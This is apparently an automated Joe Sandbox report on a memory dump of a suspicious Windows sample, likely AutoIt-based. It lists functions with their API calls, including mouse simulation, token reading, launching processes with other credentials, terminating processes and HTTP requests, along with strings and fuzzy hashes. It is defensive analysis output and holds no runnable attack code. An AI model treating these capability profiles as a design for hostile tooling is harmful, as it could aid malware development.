Instruction Fuzzy Hash: A3417134602248AFDB22CF28D699B947BF1FF45710F1841B9E9489F6E3C731A856CB61

Function 009F709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,009F4E41,?,?,00000000,00000001), ref: 009F70AC

Part of subcall function 009F39A0: GetWindowRect.USER32(?,?), ref: 009F39B3

GetDesktopWindow.USER32 ref: 009F70D6
GetWindowRect.USER32(00000000), ref: 009F70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009F710F

Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC

GetCursorPos.USER32(?), ref: 009F713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009F7199

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 22cf9bb2e12056613a8b817c8dd5ca64309a07e1654f05f2cff3cf66f71698ea
Instruction ID: 9b2253cb2db1cb17284baac87576e17f9d864cb38a682caa5db9395e21468bb2
Opcode Fuzzy Hash: 22cf9bb2e12056613a8b817c8dd5ca64309a07e1654f05f2cff3cf66f71698ea
Instruction Fuzzy Hash: D431D472509309AFD720DF54CC49B5BB7AAFF88314F000919F585A7191CA74EA0ACB92

Function 009D8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D80C0
Part of subcall function 009D80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D80CA
Part of subcall function 009D80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D80D9
Part of subcall function 009D80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D80E0
Part of subcall function 009D80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D80F6

GetLengthSid.ADVAPI32(?,00000000,009D842F), ref: 009D88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009D88D6
HeapAlloc.KERNEL32(00000000), ref: 009D88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 009D88F6
GetProcessHeap.KERNEL32(00000000,00000000,009D842F), ref: 009D890A
HeapFree.KERNEL32(00000000), ref: 009D8911

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: dfe2aad8a4d23b92f025982115bdca24bec6621bedaa52afd8b7724c4ad8a389
Instruction ID: d4a5cadf832e809ff0b08ab3a2559c369a18d279810f5ead868d9e8f2976c17e
Opcode Fuzzy Hash: dfe2aad8a4d23b92f025982115bdca24bec6621bedaa52afd8b7724c4ad8a389
Instruction Fuzzy Hash: 9A11AF71551209FFDB20DFA4DD59BBF777CEB44312F10812AE885A7211DB32A902DB60

Function 009D85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009D85E2
OpenProcessToken.ADVAPI32(00000000), ref: 009D85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009D85F8
CloseHandle.KERNEL32(00000004), ref: 009D8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009D8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 009D8646

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: d8b3ea5eb5b0fd318c3c5a1040314609996bcc933fdc71612b1342dad169b1ed
Instruction ID: 6b2f1202219e6dc50a8e2e09578cbdcdb5212e29733a8b2afb798bf9e0b9ffaa
Opcode Fuzzy Hash: d8b3ea5eb5b0fd318c3c5a1040314609996bcc933fdc71612b1342dad169b1ed
Instruction Fuzzy Hash: A8114A7254020DAFDF11CFA4ED49BDF7BADEB08714F048065FE04A2161C6729D629B61

Function 009DB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009DB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 009DB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009DB7CD
ReleaseDC.USER32(00000000,00000000), ref: 009DB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 009DB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 009DB7FE

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b0641c501896d5d5d19f3ccf2d2c05625425db7c9a3c824b3062e38bfc0b0bce
Instruction ID: 8a7892d74d750cfcf1878463af74e0f77c4058455f94ca015018972bf1078f23
Opcode Fuzzy Hash: b0641c501896d5d5d19f3ccf2d2c05625425db7c9a3c824b3062e38bfc0b0bce
Instruction Fuzzy Hash: 27017175A40209BFEB109BE69C45B5ABFA8EB48311F008066FA08B7291D6319C02CF90

Function 009A0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 009A019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 009A01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 009A01C1

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 46838979a6bf481e4e09cfb53bec2aab8c08281ed45ddda560dfae4b42c0eb69
Instruction ID: a7273e61a10b47488e283bb1f6cc550f1e132c8221c3aafd248b3b1757c1de98
Opcode Fuzzy Hash: 46838979a6bf481e4e09cfb53bec2aab8c08281ed45ddda560dfae4b42c0eb69
Instruction Fuzzy Hash: 97016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5

Function 009E53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009E53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009E540F
GetWindowThreadProcessId.USER32(?,?), ref: 009E541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E543E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0b568bb36dc16b49dc1b0f2f0c8aa2b20061e6266dbe5e1d41b3347878512139
Instruction ID: 83591b98c131512533fd2f3951edbc4199f6a24dcdec08321bed8ed9b26d380e
Opcode Fuzzy Hash: 0b568bb36dc16b49dc1b0f2f0c8aa2b20061e6266dbe5e1d41b3347878512139
Instruction Fuzzy Hash: 4BF0123154155CBFD7319B929C0DEAB7A7CEBC6B11F000169FA04E145196A51A0386B5

Function 009E7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 009E7243
EnterCriticalSection.KERNEL32(?,?,00990EE4,?,?), ref: 009E7254
TerminateThread.KERNEL32(00000000,000001F6,?,00990EE4,?,?), ref: 009E7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00990EE4,?,?), ref: 009E726E

Part of subcall function 009E6C35: CloseHandle.KERNEL32(00000000,?,009E727B,?,00990EE4,?,?), ref: 009E6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 009E7281
LeaveCriticalSection.KERNEL32(?,?,00990EE4,?,?), ref: 009E7288

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 320d3c6eaae284c4c0ebade1a5c513c69d64745bcd54911e396e9071a0526378
Instruction ID: 68f1be10dbae12cf66729e86e384fae942a555268f22e3e5bdc03bc30ffb9624
Opcode Fuzzy Hash: 320d3c6eaae284c4c0ebade1a5c513c69d64745bcd54911e396e9071a0526378
Instruction Fuzzy Hash: 5BF05E76540716EFE722ABA4ED8CADA7729EF59702B100631F603A14A1CB765803CB50

Function 009D8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009D899D
UnloadUserProfile.USERENV(?,?), ref: 009D89A9
CloseHandle.KERNEL32(?), ref: 009D89B2
CloseHandle.KERNEL32(?), ref: 009D89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 009D89C3
HeapFree.KERNEL32(00000000), ref: 009D89CA

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f109efafab58773bbb0a2b621f8c70ffa700fc6e8e91aec7fe8e7a0877dbac57
Instruction ID: f0523ea54fac843d97d24ce1705c4a6e566ef04e40b6161c6682d1d7396013e7
Opcode Fuzzy Hash: f109efafab58773bbb0a2b621f8c70ffa700fc6e8e91aec7fe8e7a0877dbac57
Instruction Fuzzy Hash: 49E0C236004209FFDA119FE1EC0C90ABB79FB89722B108230F329A5870CB329463DB91

Function 009F85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009F8613
CharUpperBuffW.USER32(?,?), ref: 009F8722
VariantClear.OLEAUT32(?), ref: 009F889A

Part of subcall function 009E7562: VariantInit.OLEAUT32(00000000), ref: 009E75A2
Part of subcall function 009E7562: VariantCopy.OLEAUT32(00000000,?), ref: 009E75AB
Part of subcall function 009E7562: VariantClear.OLEAUT32(00000000), ref: 009E75B7

Strings

Incorrect Parameter format, xrefs: 009F864B, 009F880D
AUTOIT.ERROR, xrefs: 009F8728

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 828c00bcb1dba732b31fc6934dfc95c903d17b277986934290e4adef95ff4644
Instruction ID: d9c74807c94d66463bc3691f3037941553e823f7853722a051f139775165fe0b
Opcode Fuzzy Hash: 828c00bcb1dba732b31fc6934dfc95c903d17b277986934290e4adef95ff4644
Instruction Fuzzy Hash: E5918C706043059FC750EF24C484A6BB7E8EFC9754F14892EF99A8B361DB31E906CB92

Function 009E2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9

_memset.LIBCMT ref: 009E2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009E2C97

Strings

0, xrefs: 009E2B73

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: d4498edd55997262013d3c0396e0c42ccb79b93abd88a3747b9e5accc3d06161
Instruction ID: 9395a3d4f5cfaebbe8ca56f3e72c7213315afc4963897e17a5394e38592f06ed
Opcode Fuzzy Hash: d4498edd55997262013d3c0396e0c42ccb79b93abd88a3747b9e5accc3d06161
Instruction Fuzzy Hash: DA51CB716083809BD7269F2AC845A6FB7ECAB8A310F240A69F895D6291DB60CC04D792

Function 009DD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009DD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009DD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009DD69D

Strings

DllGetClassObject, xrefs: 009DD610

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: bb4e88547685520a6d65b775cc45afe66db0af385d3a23d8f9efda7ccab18299
Instruction ID: a8f006cb7301a5490246f5ab961dab59e7d7b9d68c06415cb60b232acf205180
Opcode Fuzzy Hash: bb4e88547685520a6d65b775cc45afe66db0af385d3a23d8f9efda7ccab18299
Instruction Fuzzy Hash: 54418CB1641208EFDB15CF64C884B9ABBA9EF44314F15C1AAAD09AF305D7B1DA44CBE0

Function 009E2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009E27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 009E2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A45890,00000000), ref: 009E286B

Strings

0, xrefs: 009E27B5

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
Instruction ID: c240869e242f9da8a114ff4ea261295b7f0ef419ce6458030d6b313a135896bd
Opcode Fuzzy Hash: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
Instruction Fuzzy Hash: 8A417C702083819FD726DF26C844B1ABBECAF85314F144A6DF9A5972D2D730ED05CB52

Function 009FD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FD7C5

Part of subcall function 0098784B: _memmove.LIBCMT ref: 00987899

Strings

none, xrefs: 009FD8A0
cdecl, xrefs: 009FD81C
winapi, xrefs: 009FD836
stdcall, xrefs: 009FD847

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: fb0d623fb39ca6d4ee291c1ec2331729afec02494bed2fe2da5125152a798023
Instruction ID: c73b3e5d25b31936aaf263e96b28a03f91025524edca8e3b79c3a6b461f5fc70
Opcode Fuzzy Hash: fb0d623fb39ca6d4ee291c1ec2331729afec02494bed2fe2da5125152a798023
Instruction Fuzzy Hash: FD319C71904619ABCF00EF94C851ABEB7B9FF85324F108A29E825A77D1DB71AD05CB80

Function 009D8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009D8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009D8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 009D8F57

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

Strings

ListBox, xrefs: 009D8ED3
ComboBox, xrefs: 009D8E9E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 6b8b66bd8b09cc97316b4c089db50b17febfbcd2692a6fc4a58937af3e67825e
Instruction ID: ddc375024500c0c25cc6de69dccd7f1233cff16963e821fda0bfbf02a0051c8d
Opcode Fuzzy Hash: 6b8b66bd8b09cc97316b4c089db50b17febfbcd2692a6fc4a58937af3e67825e
Instruction Fuzzy Hash: 7C21F275A40108BEDB24ABB48C45EFFB779DF85320F50861AF421A73E2DB39480A9650

Function 009F182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009F18A2
InternetCloseHandle.WININET(00000000), ref: 009F18E9

Part of subcall function 009F2483: GetLastError.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F2498
Part of subcall function 009F2483: SetEvent.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F24AD

Strings

, xrefs: 009F1893

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: fc5ac0c1a8ba98fa6a5e95347320a59608e98ea6da0c131d2e1ea7b9d44b611a
Instruction ID: c85c9df2790bfaa4c4d43b59008ceccf86403a1caf3d09448c5f5f5d37a969a2
Opcode Fuzzy Hash: fc5ac0c1a8ba98fa6a5e95347320a59608e98ea6da0c131d2e1ea7b9d44b611a
Instruction Fuzzy Hash: EA2180B150020CBFEB119BA4DD85FBB77EDEB88784F10412AF605A6240DA649D0657A1

Function 00A063E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A06461
LoadLibraryW.KERNEL32(?), ref: 00A06468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A0647D
DestroyWindow.USER32(?), ref: 00A06485

Strings

SysAnimate32, xrefs: 00A0643C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
